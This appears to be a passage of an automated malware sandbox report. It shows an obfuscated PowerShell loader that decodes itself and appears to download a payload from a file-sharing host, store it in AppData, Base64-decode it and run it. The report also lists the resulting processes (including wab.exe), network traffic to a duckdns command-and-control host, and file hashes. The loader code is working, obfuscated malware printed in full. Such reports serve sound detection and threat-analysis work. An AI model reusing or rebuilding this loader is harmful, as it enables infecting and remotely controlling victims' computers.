,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| BE | 2.17.196.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 171.196.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.sendspace.com | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n2.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n2.sendspace.com | tcp |
| US | 8.8.8.8:53 | crt.sectigo.com | udp |
| US | 8.8.8.8:53 | 80.28.21.104.in-addr.arpa | udp |
| US | 172.64.149.23:80 | crt.sectigo.com | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.136.31.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| BE | 2.17.196.171:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 104.21.28.80:443 | www.sendspace.com | tcp |
| US | 8.8.8.8:53 | fs03n3.sendspace.com | udp |
| CA | 69.31.136.17:443 | fs03n3.sendspace.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xvern429.duckdns.org | udp |
| US | 12.202.180.134:8890 | xvern429.duckdns.org | tcp |
| US | 8.8.8.8:53 | 134.180.202.12.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/2628-0-0x00007FFC48D03000-0x00007FFC48D05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_owbo2hwy.0hv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2628-6-0x000001DCB8A80000-0x000001DCB8AA2000-memory.dmp
memory/2628-11-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp
memory/2628-12-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp
memory/4156-21-0x0000000002290000-0x00000000022C6000-memory.dmp
memory/4156-22-0x0000000004D30000-0x0000000005358000-memory.dmp
memory/4156-23-0x0000000004CE0000-0x0000000004D02000-memory.dmp
memory/4156-25-0x0000000005570000-0x00000000055D6000-memory.dmp
memory/4156-24-0x00000000053D0000-0x0000000005436000-memory.dmp
memory/4156-35-0x00000000055E0000-0x0000000005934000-memory.dmp
memory/4156-36-0x0000000005B90000-0x0000000005BAE000-memory.dmp
memory/4156-37-0x0000000005BD0000-0x0000000005C1C000-memory.dmp
memory/4156-38-0x00000000073D0000-0x0000000007A4A000-memory.dmp
memory/4156-39-0x0000000006120000-0x000000000613A000-memory.dmp
memory/4156-40-0x0000000006EA0000-0x0000000006F36000-memory.dmp
memory/4156-41-0x0000000006E00000-0x0000000006E22000-memory.dmp
memory/4156-42-0x0000000008000000-0x00000000085A4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Absterge.Pig
| MD5 | ce1f757dad7e08f32964a255a380674e |
| SHA1 | 19e38ec002272355856d0f68324c0b18a7a07dc0 |
| SHA256 | 4e0fe5353ac7e82175ab48a53995198157b546bb2eec91ee1d7d63432b710548 |
| SHA512 | ad6b88260234a1abf893680f0332510cd08f9192b6e76478c962203617e689b9cf538f7b2aa44422493d4a80b872a24bcf4258e17a540eaf901a59f37933707e |
memory/4156-44-0x00000000085B0000-0x00000000094D9000-memory.dmp
memory/2628-45-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp
memory/2628-46-0x00007FFC48D03000-0x00007FFC48D05000-memory.dmp
memory/2608-64-0x0000000000C70000-0x0000000000C86000-memory.dmp
memory/2608-63-0x0000000000C70000-0x0000000001EC4000-memory.dmp
memory/2628-67-0x00007FFC48D00000-0x00007FFC497C1000-memory.dmp
memory/2608-68-0x0000000020600000-0x000000002069C000-memory.dmp